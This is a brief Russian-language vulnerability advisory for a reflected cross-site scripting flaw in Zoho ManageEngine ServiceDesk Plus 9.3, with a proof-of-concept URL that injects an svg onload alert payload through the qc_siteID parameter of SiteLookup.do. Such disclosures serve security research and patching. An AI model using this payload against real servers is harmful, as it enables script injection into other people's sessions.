
Описание информации: В Zoho ManageEngine ServiceDesk Plus 9.3 обнаружена проблема. XSS возможен через параметр qc_siteID в SiteLookup.do.
Автор: Concobe из Tarantula Team - VinCSS (участник Vingroup)
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=